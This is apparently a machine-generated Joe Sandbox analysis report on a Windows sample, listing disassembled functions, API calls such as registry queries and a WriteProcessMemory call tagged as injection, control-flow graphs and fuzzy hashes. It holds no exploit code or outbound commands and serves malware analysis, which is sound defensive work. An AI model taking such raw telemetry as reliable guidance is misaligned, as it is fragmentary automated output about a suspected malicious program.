                                                                        • Opcode Fuzzy Hash: 01e975ac5f248ade002a1b4312551b4b8660e463ee2c6fddfbfe61f3c0660bd8
                                                                        • Instruction Fuzzy Hash: 59E09270600711CFC3309FAAE9047667BE4AF05704F80885DF986C3651DBB4E844CB92
                                                                        Function 00AE6C20 Relevance: 5.2, APIs: 4, Instructions: 183memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,40000022,1816BA6E,?,00000000,?,?,?,?,00B29DA0,000000FF,?,00AE6432,00000000,?), ref: 00AE6CC4
                                                                        • LocalAlloc.KERNEL32(00000040,3FFFFFFF,1816BA6E,?,00000000,?,?,?,?,00B29DA0,000000FF,?,00AE6432,00000000,?), ref: 00AE6CE7
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00B29DA0,000000FF,?,00AE6432,00000000), ref: 00AE6D87
                                                                        • LocalFree.KERNEL32(?,1816BA6E,00000000,00B293B0,000000FF,?,00000000,00000000,00B29DA0,000000FF,1816BA6E), ref: 00AE6E0D
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2012307162-0
                                                                        • Opcode ID: 8ea78576166097063b433a760416828eefb38dfd761bda0c75daee97b1eae676
                                                                        • Instruction ID: 616b4f1c7874917d2cac5d6be71b5aeb30f4932e6b9f117d76d73a551c060d91
                                                                        • Opcode Fuzzy Hash: 8ea78576166097063b433a760416828eefb38dfd761bda0c75daee97b1eae676
                                                                        • Instruction Fuzzy Hash: 2C51B0B5A006459FDB18CF69CD85BAEBBB4FB58350F24462DE815E7380DB31AE10CB90
                                                                        Function 00AE4A80 Relevance: 5.2, APIs: 4, Instructions: 169memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,00000000,?,?), ref: 00AE4B05
                                                                        • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,00000000,?,?), ref: 00AE4B25
                                                                        • LocalFree.KERNEL32(7FFFFFFE,?,?,00000000,?,00000000,?,?), ref: 00AE4BAB
                                                                        • LocalFree.KERNEL32(00000000,1816BA6E,00000000,00000000,Function_000492C0,000000FF,?,?,00000000,?,00000000,?,?), ref: 00AE4C2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2012307162-0
                                                                        • Opcode ID: 8c71bbe2b7e9b097bc520859c5fd01e4e9f6914aaae8c23f05d31655dddc5376
                                                                        • Instruction ID: 656e3b20d420f2c6b947fc79578abb2f0ea278a6f7770d441a6c9f36b493d154
                                                                        • Opcode Fuzzy Hash: 8c71bbe2b7e9b097bc520859c5fd01e4e9f6914aaae8c23f05d31655dddc5376
                                                                        • Instruction Fuzzy Hash: CA51EE326042559FC7249F29DC80A6AB7EDFF88360F100A6EF866D7691DB70E9008B91

                                                                        Execution Graph

                                                                        Execution Coverage:1%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:144
                                                                        Total number of Limit Nodes:8
                                                                        execution_graph 18525 ac74bc 18526 ac74e8 18525->18526 18527 ac74c6 RegCloseKey 18525->18527 18527->18526 18529 ac8004 18534 ac7f4c 18529->18534 18533 ac8048 18540 ac7ef8 18534->18540 18536 ac7f60 18536->18533 18537 ac84f8 18536->18537 18538 ac851e RegQueryValueExW 18537->18538 18539 ac8531 18538->18539 18539->18533 18541 ac7f10 RegQueryValueExW 18540->18541 18543 ac7f37 18541->18543 18543->18536 18544 ccaa66 18545 ccaa71 18544->18545 18548 cca970 18545->18548 18549 cca97c 18548->18549 18552 cca9c9 18549->18552 18555 ccaa19 18549->18555 18556 cca83b 18549->18556 18551 cca9f9 18553 cca83b ___DllMainCRTStartup 5 API calls 18551->18553 18551->18555 18552->18551 18554 cca83b ___DllMainCRTStartup 5 API calls 18552->18554 18552->18555 18553->18555 18554->18551 18557 cca84a 18556->18557 18558 cca8c6 18556->18558 18568 cca855 __getptd 18557->18568 18572 ccb99d 18557->18572 18559 cca8fd 18558->18559 18565 cca8cc 18558->18565 18560 cca95b 18559->18560 18561 cca902 18559->18561 18560->18568 18590 ccb92f 18560->18590 18580 ccb615 TlsGetValue 18561->18580 18566 ccb649 __mtterm TlsFree 18565->18566 18565->18568 18566->18568 18567 cca907 __freeptd 18567->18568 18584 ccaa89 18567->18584 18568->18552 18571 cca861 18571->18568 18576 ccb649 18571->18576 18574 ccb9ac __onexit_nolock __freeptd 18572->18574 18573 ccb649 __mtterm TlsFree 18575 ccbb05 __getptd 18573->18575 18574->18573 18574->18575 18575->18571 18579 ccb653 __freeptd 18576->18579 18577 ccb681 18578 ccb673 TlsFree 18578->18577 18579->18577 18579->18578 18581 ccb645 18580->18581 18582 ccb62a __freeptd 18580->18582 18581->18567 18583 ccb635 TlsSetValue 18582->18583 18583->18581 18589 ccaa95 __freefls@4 18584->18589 18585 ccab00 18585->18568 18586 ccaae9 HeapFree 18586->18585 18587 ccaafb 18586->18587 18596 ccbd7e 18587->18596 18589->18585 18589->18586 18591 ccb988 18590->18591 18595 ccb93d __freeptd 18590->18595 18592 ccb99b 18591->18592 18593 ccb992 TlsSetValue 18591->18593 18592->18568 18593->18592 18605 ccb800 18595->18605 18599 ccb76d 18596->18599 18598 ccbd83 18598->18585 18600 ccb776 18599->18600 18601 ccb615 __getptd 2 API calls 18600->18601 18602 ccb784 __freeptd 18601->18602 18603 ccb7b9 __getptd 18602->18603 18604 ccaa89 __freefls@4 3 API calls 18602->18604 18603->18598 18604->18603 18606 ccb80c 18605->18606 18608 ccb90e 18606->18608 18609 ccaa89 __freefls@4 3 API calls 18606->18609 18612 ccb824 18606->18612 18607 ccb832 18611 ccb840 18607->18611 18613 ccaa89 __freefls@4 3 API calls 18607->18613 18608->18591 18609->18612 18610 ccaa89 __freefls@4 3 API calls 18610->18607 18614 ccb84e 18611->18614 18615 ccaa89 __freefls@4 3 API calls 18611->18615 18612->18607 18612->18610 18613->18611 18616 ccb85c 18614->18616 18618 ccaa89 __freefls@4 3 API calls 18614->18618 18615->18614 18617 ccb86a 18616->18617 18619 ccaa89 __freefls@4 3 API calls 18616->18619 18620 ccb878 18617->18620 18621 ccaa89 __freefls@4 3 API calls 18617->18621 18618->18616 18619->18617 18622 ccaa89 __freefls@4 3 API calls 18620->18622 18623 ccb889 18620->18623 18621->18620 18622->18623 18624 ccaa89 __freefls@4 3 API calls 18623->18624 18627 ccb8b6 __freefls@4 18623->18627 18624->18627 18625 ccb8fb __freefls@4 18626 ccaa89 __freefls@4 3 API calls 18625->18626 18626->18608 18627->18625 18629 ccb1fa 18627->18629 18630 ccb211 18629->18630 18631 ccb27e 18629->18631 18630->18631 18633 ccb23a 18630->18633 18638 ccaa89 __freefls@4 3 API calls 18630->18638 18632 ccaa89 __freefls@4 3 API calls 18631->18632 18652 ccb2cb 18631->18652 18634 ccb29f 18632->18634 18635 ccb25b 18633->18635 18645 ccaa89 __freefls@4 3 API calls 18633->18645 18636 ccaa89 __freefls@4 3 API calls 18634->18636 18642 ccaa89 __freefls@4 3 API calls 18635->18642 18640 ccb2b2 18636->18640 18637 ccaa89 __freefls@4 3 API calls 18641 ccb2f2 18637->18641 18638->18633 18639 ccb337 18644 ccaa89 __freefls@4 3 API calls 18639->18644 18646 ccaa89 __freefls@4 3 API calls 18640->18646 18641->18639 18647 ccaa89 HeapFree TlsGetValue TlsSetValue __freefls@4 18641->18647 18643 ccb273 18642->18643 18648 ccaa89 __freefls@4 3 API calls 18643->18648 18649 ccb33d 18644->18649 18645->18635 18650 ccb2c0 18646->18650 18647->18641 18648->18631 18649->18625 18651 ccaa89 __freefls@4 3 API calls 18650->18651 18651->18652 18652->18637 18652->18641 18653 cbb7b0 18654 cbb7db 18653->18654 18655 cbb805 18653->18655 18654->18655 18656 cbb7e2 WriteProcessMemory 18654->18656 18657 bc51d0 18658 bc51fb 18657->18658 18662 ac7778 18658->18662 18674 ac7774 18658->18674 18659 bc5259 18663 ac77a2 18662->18663 18664 ac77f0 RegOpenKeyExW 18663->18664 18665 ac77ff 18664->18665 18666 ac7808 18665->18666 18669 ac7846 18665->18669 18686 ac7518 18666->18686 18668 ac7841 18668->18659 18670 ac787e 18669->18670 18672 ac78b9 18669->18672 18671 ac7518 RegCloseKey 18670->18671 18671->18668 18672->18668 18673 ac7518 RegCloseKey 18672->18673 18673->18668 18675 ac77a2 18674->18675 18676 ac77f0 RegOpenKeyExW 18675->18676 18677 ac77ff 18676->18677 18678 ac7808 18677->18678 18681 ac7846 18677->18681 18679 ac7518 RegCloseKey 18678->18679 18680 ac7841 18679->18680 18680->18659 18682 ac787e 18681->18682 18684 ac78b9 18681->18684 18683 ac7518 RegCloseKey 18682->18683 18683->18680 18684->18680 18685 ac7518 RegCloseKey 18684->18685 18685->18680 18689 ac74bc 18686->18689 18690 ac74e8 18689->18690 18691 ac74c6 RegCloseKey 18689->18691 18690->18668 18691->18690

                                                                        Executed Functions

                                                                        Function 00CCA83B Relevance: 4.6, APIs: 3, Instructions: 105COMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 cca83b-cca848 1 cca84a 0->1 2 cca8c6-cca8ca 0->2 9 cca850-cca853 1->9 3 cca8cc-cca8d2 2->3 4 cca8fd-cca900 2->4 5 cca8d4-cca8e0 3->5 6 cca855-cca857 3->6 7 cca95b-cca95e 4->7 8 cca902-cca919 call ccb615 4->8 13 cca8e7-cca8ea 5->13 14 cca8e2 5->14 10 cca96a-cca96d 6->10 11 cca967-cca969 7->11 12 cca960-cca966 call ccb92f 7->12 8->6 27 cca91f-cca936 call ccb59a 8->27 9->6 16 cca85c-cca863 call ccb99d 9->16 11->10 12->11 13->11 19 cca8ec-cca8fb call ccb649 13->19 14->13 24 cca86c-cca88d 16->24 25 cca865-cca86a 16->25 19->11 45 cca88f-cca894 call ccb649 24->45 46 cca896-cca89d 24->46 25->6 37 cca94f-cca956 call ccaa89 27->37 38 cca938-cca94d call ccb686 27->38 37->6 38->11 45->25 51 cca8bf-cca8c4 46->51 52 cca89f-cca8a6 46->52 51->45 52->51 55 cca8a8-cca8b2 52->55 55->51 57 cca8b4-cca8ba 55->57 57->11
                                                                        APIs
                                                                        • __mtterm.LIBCMT ref: 00CCA88F
                                                                          • Part of subcall function 00CCB649: TlsFree.KERNEL32(00CDC65C,00CCA8F6), ref: 00CCB674
                                                                        • __mtterm.LIBCMT ref: 00CCA8F1
                                                                        • __freeptd.LIBCMT ref: 00CCA961
                                                                          • Part of subcall function 00CCB615: TlsGetValue.KERNEL32(?,00CCB784,?,?,00CCBD83,00CCA0BB), ref: 00CCB61E
                                                                          • Part of subcall function 00CCB615: TlsSetValue.KERNEL32(00000000,00CCB784,?,?,00CCBD83,00CCA0BB), ref: 00CCB63F
                                                                          • Part of subcall function 00CCAA89: HeapFree.KERNEL32(00000000,?), ref: 00CCAAF1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4442189161.0000000000CCA000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CCA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_cca000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FreeValue__mtterm$Heap__freeptd
                                                                        • String ID:
                                                                        • API String ID: 514583591-0
                                                                        • Opcode ID: 705a112cbdc3a22f5882c665b9edd7327f068e89c047d61395d3de836778bc0e
                                                                        • Instruction ID: 3a56ea319551f552f09ad4a4777cfb9e1882383b4520a202562f9fe167a5019b
                                                                        • Opcode Fuzzy Hash: 705a112cbdc3a22f5882c665b9edd7327f068e89c047d61395d3de836778bc0e
                                                                        • Instruction Fuzzy Hash: C12185315156499AAA257BF6DC0BF2E2354AE51768B25053FF826C10E2EF30C943B563
                                                                        Function 00BC51D0 Relevance: 3.8, Strings: 3, Instructions: 58COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 58 bc51d0-bc520a 60 bc520c-bc5213 call bc518c 58->60 61 bc5222-bc5251 58->61 60->61 65 bc5215-bc5218 60->65 72 bc5254 call ac7778 61->72 73 bc5254 call ac7774 61->73 65->61 67 bc5259-bc525b 68 bc525d-bc526d 67->68 69 bc5275-bc528a 67->69 68->69 72->67 73->67
                                                                        Strings
                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 00BC524C
                                                                        • MS Shell Dlg 2, xrefs: 00BC5260
                                                                        • Tahoma, xrefs: 00BC5218
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                        • API String ID: 0-1011973972
                                                                        • Opcode ID: fdd2317b3353e6ad9bfc121bc5e1db08e9daaf5440d29eb7473e8bc79b2b5465
                                                                        • Instruction ID: 5becec0d28a5880ced5f979aa5ed0a2c0af5335a63636234b47c5e0a7e207534
                                                                        • Opcode Fuzzy Hash: fdd2317b3353e6ad9bfc121bc5e1db08e9daaf5440d29eb7473e8bc79b2b5465
                                                                        • Instruction Fuzzy Hash: C511C170A04A48AFDB21DBA8CD52F5D7BE5EB86300F5244ACF8009B761D731AE81CB24
                                                                        Function 00AC7778 Relevance: 1.6, APIs: 1, Instructions: 150registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 74 ac7778-ac77ae call ac72b0 78 ac77b0-ac77b8 74->78 79 ac77c2-ac77fa call ac753c RegOpenKeyExW call ac74b0 74->79 78->79 84 ac77ff-ac7806 79->84 85 ac7808-ac781a 84->85 86 ac7846-ac787c call ac753c call ac74b0 84->86 87 ac781c-ac782a 85->87 88 ac7834-ac7841 call ac7518 85->88 100 ac787e-ac7890 86->100 101 ac78b9-ac78ed call ac753c call ac74b0 86->101 87->88 93 ac7925-ac793a 88->93 102 ac78aa-ac78b7 call ac7518 100->102 103 ac7892-ac78a0 100->103 101->93 112 ac78ef-ac78fe 101->112 102->93 103->102 113 ac7918-ac7920 call ac7518 112->113 114 ac7900-ac790e 112->114 113->93 114->113
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000), ref: 00AC77F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000AC3000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AC3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ac3000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: 9fbf596afc2829dac4cc4bd97f40f6d8766269636b3ff4738d1a27f1a17cca5d
                                                                        • Instruction ID: 73a4cd5d349cb19b7d6f16d8d0ee3d37c3a7dabc71e4f899909df267541c8b84
                                                                        • Opcode Fuzzy Hash: 9fbf596afc2829dac4cc4bd97f40f6d8766269636b3ff4738d1a27f1a17cca5d
                                                                        • Instruction Fuzzy Hash: 5E519230F04608BFDB11EBA8CD42F9EB7F9AB45304F1684ADA444E3352DA749F059B95
                                                                        Function 00AC7774 Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 116 ac7774-ac77ae call ac72b0 120 ac77b0-ac77b8 116->120 121 ac77c2-ac77fa call ac753c RegOpenKeyExW call ac74b0 116->121 120->121 126 ac77ff-ac7806 121->126 127 ac7808-ac781a 126->127 128 ac7846-ac787c call ac753c call ac74b0 126->128 129 ac781c-ac782a 127->129 130 ac7834-ac7841 call ac7518 127->130 142 ac787e-ac7890 128->142 143 ac78b9-ac78ed call ac753c call ac74b0 128->143 129->130 135 ac7925-ac793a 130->135 144 ac78aa-ac78b7 call ac7518 142->144 145 ac7892-ac78a0 142->145 143->135 154 ac78ef-ac78fe 143->154 144->135 145->144 155 ac7918-ac7920 call ac7518 154->155 156 ac7900-ac790e 154->156 155->135 156->155
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000), ref: 00AC77F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000AC3000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AC3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ac3000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: d6bd4821bdf9d04fcac10f3201da6ae18b21a009d3ef992bafcbde9d2af0d0f5
                                                                        • Instruction ID: 2544c746c7e53f89180e3945df95b99cbb07a79af5d52a1b2e6c79d5a43d55a3
                                                                        • Opcode Fuzzy Hash: d6bd4821bdf9d04fcac10f3201da6ae18b21a009d3ef992bafcbde9d2af0d0f5
                                                                        • Instruction Fuzzy Hash: AE21C430F08208AFDB11DBA8C852F9EB7F9AB89300F1244BDA405D3752DA349F059B91
                                                                        Function 00AC84F8 Relevance: 1.6, APIs: 1, Instructions: 50registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 158 ac84f8-ac852c RegQueryValueExW call ac74b0 161 ac8531-ac8533 158->161 162 ac8559-ac8571 call ac72f8 161->162 163 ac8535-ac8554 161->163 163->162
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000000,?,00AC81D5), ref: 00AC8523
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000AC3000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AC3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ac3000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 1d5f3f86dedde77f2cc65ac5e2bb92246038e4666bc3d9ae829a385b828df950
                                                                        • Instruction ID: 9b7f7dbae99cd7e3b23507eba38d52e75aa4f63b17ce7d99fe823933f2104a1a
                                                                        • Opcode Fuzzy Hash: 1d5f3f86dedde77f2cc65ac5e2bb92246038e4666bc3d9ae829a385b828df950
                                                                        • Instruction Fuzzy Hash: 00017172A04208AFC700EFADDC81FDEB7ACEB49314F10816AF914D7341DA759E048BA1
                                                                        Function 00CBB7B0 Relevance: 1.5, APIs: 1, Instructions: 44injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 167 cbb7b0-cbb7d9 168 cbb7db 167->168 169 cbb805-cbb80b 167->169 170 cbb7dd-cbb7e0 168->170 171 cbb7e2-cbb804 WriteProcessMemory 168->171 170->169 170->171
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00CBB7F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4442189161.0000000000CBB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CBB000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_cbb000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction ID: 2a630beec46ceb65d1739b525620c74ac3b2205c7dfad7fc430d6d96663da261
                                                                        • Opcode Fuzzy Hash: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction Fuzzy Hash: 94F0597174020E26EB148CBDDC41BFEBB9ECBC2730F1583A9B929C62D4F9B08C0542A1
                                                                        Function 00AC7EF8 Relevance: 1.5, APIs: 1, Instructions: 36registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 172 ac7ef8-ac7f49 RegQueryValueExW call ac74b0 call ac72f8
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000000,?,?,?,00AC80FC), ref: 00AC7F29
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000AC3000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AC3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ac3000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 972ba05ce29618aa42862d91a2d9de7cc2086f4e2c72ff7865856a7a5a4c30d8
                                                                        • Instruction ID: fd5e113207806c8e14beccf2bafd10ca6dba437321e3dff59b23290d0690aeeb
                                                                        • Opcode Fuzzy Hash: 972ba05ce29618aa42862d91a2d9de7cc2086f4e2c72ff7865856a7a5a4c30d8
                                                                        • Instruction Fuzzy Hash: 92F039627082006FE304EAAD9D85FAFA6DCDBC9711F14843EB258C7342D964CC0587B6
                                                                        Function 00AC74BC Relevance: 1.5, APIs: 1, Instructions: 18registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 179 ac74bc-ac74c4 180 ac74e8-ac74e9 179->180 181 ac74c6-ac74ca 179->181 182 ac74cc 181->182 183 ac74d2-ac74e0 RegCloseKey 181->183 182->183 183->180
                                                                        APIs
                                                                        • RegCloseKey.KERNELBASE(00000000,?,00AC7528,?,?,00000000,00AC773F), ref: 00AC74D6
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000AC3000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AC3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ac3000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: dee2712be3680a920236bd3b1f0a9c1fb83549ded90d691d759de67f12ecb027
                                                                        • Instruction ID: 945fdbfdab84bf8a4e07382fdd641580bbfe9f5f9fdac05323158d3f4926ae2c
                                                                        • Opcode Fuzzy Hash: dee2712be3680a920236bd3b1f0a9c1fb83549ded90d691d759de67f12ecb027
                                                                        • Instruction Fuzzy Hash: 51D067B1A082019ADF64EFB9CAC5B06BBDC6B45311B48C4AAA808CF247D624D9508B25
                                                                        Function 00C28164 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 184 c28164-c2816c 185 c28176-c281d8 call c2797c 184->185 186 c2816e 184->186 190 c281da 185->190 191 c281f9-c281ff 185->191 186->185 194 c281e4-c281f1 190->194 192 c28210-c28216 191->192 193 c28201-c2820d 191->193 193->192 194->191
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000C09000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C09000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_c09000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: comctl32.dll
                                                                        • API String ID: 0-431930879
                                                                        • Opcode ID: d05886b4a54a592d5ed20caeaa514d70a6fb6a4293b87ed2a5fba88c29ed6ada
                                                                        • Instruction ID: c3f6e85038296e42f779a8efa20f196a7faa9d335ceb47d8cf16ebb6a46a5066
                                                                        • Opcode Fuzzy Hash: d05886b4a54a592d5ed20caeaa514d70a6fb6a4293b87ed2a5fba88c29ed6ada
                                                                        • Instruction Fuzzy Hash: CD118275A05750CFC360DF6CE98178ABBF0FB0A710B044629E885C3B62E730E949CB95
                                                                        Function 011B2BBE Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 196 11b2bbe-11b2bc9 197 11b2bd6-11b2c00 196->197 199 11b2bbc 197->199 200 11b2c02-11b2c1d 197->200 199->196
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4454509843.00000000011B2000.00000020.00000001.01000000.00000007.sdmp, Offset: 011B2000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_11b2000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =
                                                                        • API String ID: 0-2322244508
                                                                        • Opcode ID: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction ID: cb30cbb8f3689df55e39e504f51f89424b657811c893f108889f2c30a377c2ee
                                                                        • Opcode Fuzzy Hash: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction Fuzzy Hash: 4CF05C11968146DFC721CA3884C0F677BE1CF96311F25976CB89A8B641D2794C0EE601
                                                                        Function 00C80354 Relevance: .1, Instructions: 104COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 201 c80354-c8036c 202 c8036e-c8037d 201->202 203 c8037f-c80381 201->203 202->203 206 c80383 202->206 204 c80385-c803c8 203->204 208 c803cd-c803f9 204->208 206->204 210 c803fb-c8040b 208->210 211 c8046f-c80483 208->211 210->211 216 c8040d-c80427 210->216 214 c804a1 211->214 215 c80485-c80495 211->215 215->214 218 c80497-c8049a 215->218 220 c80429-c8044b 216->220 221 c80451-c80464 216->221 218->214 220->221 221->211
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000C80000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_c80000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9544d67cf13d5efbcfbf0120930a956e436574231354a15e3b4163e4a05c7860
                                                                        • Instruction ID: 8166a185a15cbf7c805bc04530e2a9bdf41072170399c599da972417e0068558
                                                                        • Opcode Fuzzy Hash: 9544d67cf13d5efbcfbf0120930a956e436574231354a15e3b4163e4a05c7860
                                                                        • Instruction Fuzzy Hash: BC416D34A04244EFDB44DF69C881B9EB7F6EB89314F6185F5E851A7362C730AE44DB10
                                                                        Function 00BD5C0C Relevance: .1, Instructions: 91COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 223 bd5c0c-bd5c2d 225 bd5c2f-bd5c56 223->225 226 bd5c78-bd5c9f 223->226 231 bd5cbf-bd5cfe 225->231 232 bd5c58-bd5c65 225->232 226->231 233 bd5ca1-bd5cae 226->233 241 bd5d0e-bd5d16 231->241 232->231 238 bd5c67-bd5c76 232->238 233->231 237 bd5cb0-bd5cb9 233->237 237->231 238->231
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
